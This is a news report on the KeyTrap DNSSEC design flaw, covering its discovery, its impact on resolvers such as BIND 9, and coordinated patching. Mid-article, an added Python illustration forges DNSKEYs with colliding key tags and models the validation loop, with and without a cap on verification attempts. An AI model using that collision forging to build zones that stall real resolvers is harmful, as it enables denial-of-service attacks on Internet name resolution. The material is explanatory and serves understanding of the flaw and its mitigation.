A fundamental design flaw that has been present in the DNS Security Extensions (DNSSEC) specifications since around 2000 has only now been identified by researchers; under certain circumstances it could be exploited to knock out name resolution across wide expanses of the Internet.
DNS servers translate domain names into IP addresses and, mostly invisibly, underpin nearly every connection made on the Internet.
The team behind the discovery is from ATHENE National Research Center for Applied Cybersecurity in Germany.
According to their new report on the KeyTrap bug, a single crafted DNS response, fetched from a zone the attacker controls, can force a resolver that performs DNSSEC validation to attempt an enormous number of signature verifications, consuming all of its CPU until it stalls and stops answering queries.
If many resolvers were hit with KeyTrap simultaneously, they could all be taken down at once, resulting in widespread Internet outages, the academics said.
In testing, how long the resolvers remained unresponsive after an attack varied by implementation, but the report noted that BIND 9, the most widely deployed DNS software, could remain stalled for up to 16 hours.
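The mechanism behind that stall, as an added illustration that is not code from the ATHENE team or any DNS vendor: DNSSEC identifies keys by a 16-bit key tag (RFC 4034 Appendix B) that is a plain checksum over the DNSKEY record, so an attacker can mint many distinct keys that all share one tag; a validator that follows RFC 4035 and tries every matching key against every RRSIG then performs keys times signatures public-key verifications before it can conclude the data is bogus. The script below computes key tags, forges colliding keys, and models that validation loop with and without a cap on attempts. The key bytes, the always-failing `reject_all` verifier, the `colliding_zone` builder and the `max_attempts` value are constructed for this example.

```python
"""KeyTrap-style key-tag collisions, illustrated (example code, not ATHENE's or any vendor's)."""
import struct


def dnskey_rdata(flags: int, algorithm: int, public_key: bytes, protocol: int = 3) -> bytes:
    """Wire-format DNSKEY RDATA: flags(2) | protocol(1) | algorithm(1) | public key."""
    return struct.pack("!HBB", flags, protocol, algorithm) + public_key


def _word_sum(data: bytes) -> int:
    # Even offsets are the high byte of a 16-bit word, odd offsets the low byte.
    return sum(b << 8 if i % 2 == 0 else b for i, b in enumerate(data))


def key_tag(rdata: bytes) -> int:
    """RFC 4034 Appendix B key tag (for algorithms other than 1): sum the 16-bit words,
    fold the carry once, keep the low 16 bits. A checksum, not a hash, so collisions are cheap."""
    ac = _word_sum(rdata)
    ac += (ac >> 16) & 0xFFFF
    return ac & 0xFFFF


def forge_colliding_key(target_tag: int, flags: int, algorithm: int, base_key: bytes) -> bytes:
    """Extend base_key with a short suffix so its DNSKEY RDATA has key tag == target_tag.
    Appending one aligned 16-bit word w adds w to the checksum, so a 64K search reaches every
    tag value but one; a second pass offset by 0xFFFF covers that remaining value."""
    head = dnskey_rdata(flags, algorithm, base_key)
    if len(head) % 2:
        head += b"\x00"  # keep the appended words on even offsets
    base = _word_sum(head)
    for prefix in (b"", b"\xff\xff"):
        start = base + _word_sum(prefix)
        for w in range(1 << 16):
            ac = start + w
            if (ac + ((ac >> 16) & 0xFFFF)) & 0xFFFF == target_tag:
                forged = head[4:] + prefix + w.to_bytes(2, "big")
                assert key_tag(dnskey_rdata(flags, algorithm, forged)) == target_tag
                return forged
    raise RuntimeError("no suffix found")  # not reachable per the argument above


def reject_all(key: bytes, signature: bytes) -> bool:
    """Stand-in for the real RSA/ECDSA check (constructed for the example). Attacker-supplied
    signatures never verify; in a real resolver every call here is a full public-key operation."""
    return False


def validate_rrset(dnskeys, rrsigs, verify=reject_all, max_attempts=None):
    """RFC 4035 section 5.3.1 selection rule: for each RRSIG, try every DNSKEY whose algorithm
    and key tag match until one verifies. Returns (status, attempts). max_attempts is an
    illustrative bound of the kind vendor patches introduced; the real limits differ per product."""
    attempts = 0
    for sig in rrsigs:
        for key in dnskeys:
            if key[3] != sig["algorithm"] or key_tag(key) != sig["key_tag"]:
                continue  # non-matching keys cost nothing, which is why the tags must collide
            if max_attempts is not None and attempts >= max_attempts:
                return "bogus-capped", attempts
            attempts += 1
            if verify(key, sig["signature"]):
                return "secure", attempts
    return "bogus", attempts


def colliding_zone(n_keys: int, n_sigs: int, tag: int = 1290):
    """Constructed attacker zone: n_keys distinct DNSKEYs sharing one tag, plus one decoy key
    with a different tag, and n_sigs RRSIGs that all name the colliding tag."""
    keys = [dnskey_rdata(257, 8, forge_colliding_key(tag, 257, 8, bytes([i]))) for i in range(n_keys)]
    keys.append(dnskey_rdata(257, 8, b"\x00\x00"))  # key tag 1033, never tried
    sigs = [{"algorithm": 8, "key_tag": tag, "signature": bytes([i]) * 8} for i in range(n_sigs)]
    return keys, sigs


if __name__ == "__main__":
    keys, sigs = colliding_zone(10, 10)
    print(validate_rrset(keys, sigs))                   # ('bogus', 100)
    print(validate_rrset(keys, sigs, max_attempts=16))  # ('bogus-capped', 16)
```

With 10 colliding keys and 10 RRSIGs the uncapped model performs 100 verification attempts before giving up; a real response packs far more of each into a single message, and each attempt is a full RSA or ECDSA verification, which is what drives the CPU exhaustion the report describes. Bounding the number of attempts, as the capped call does, is the general shape of the mitigation vendors shipped, not their exact limits.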
According to the Internet Systems Consortium (ISC), which maintains BIND, 34% of DNS resolvers in North America perform DNSSEC validation and are therefore exposed to the flaw until patched.
The research team spent the past several months working with major DNS service providers, including Google and Cloudflare, to deploy necessary patches before making their work public.
The team noted that the patches are mitigations rather than a permanent fix, and that it is working with the standards community to revise the DNSSEC specifications and rethink the validation design.
Fernando Montenegro, Omdia's senior principal analyst for cybersecurity, praises the researchers for disclosing the flaw in close coordination with the vendor ecosystem.
From here, it's up to the service providers to find a path toward a permanent fix for affected DNS resolvers, he adds.
ISC does not recommend that administrators disable DNSSEC validation on their resolvers, even though doing so would stop the attack: it would also strip away the protection DNSSEC provides against forged DNS responses.
For those running the open source BIND 9 software, ISC has released patched versions that address the issue, tracked as CVE-2023-50387.
This Cyber News was published on www.darkreading.com. Publication date: Tue, 20 Feb 2024 18:35:09 +0000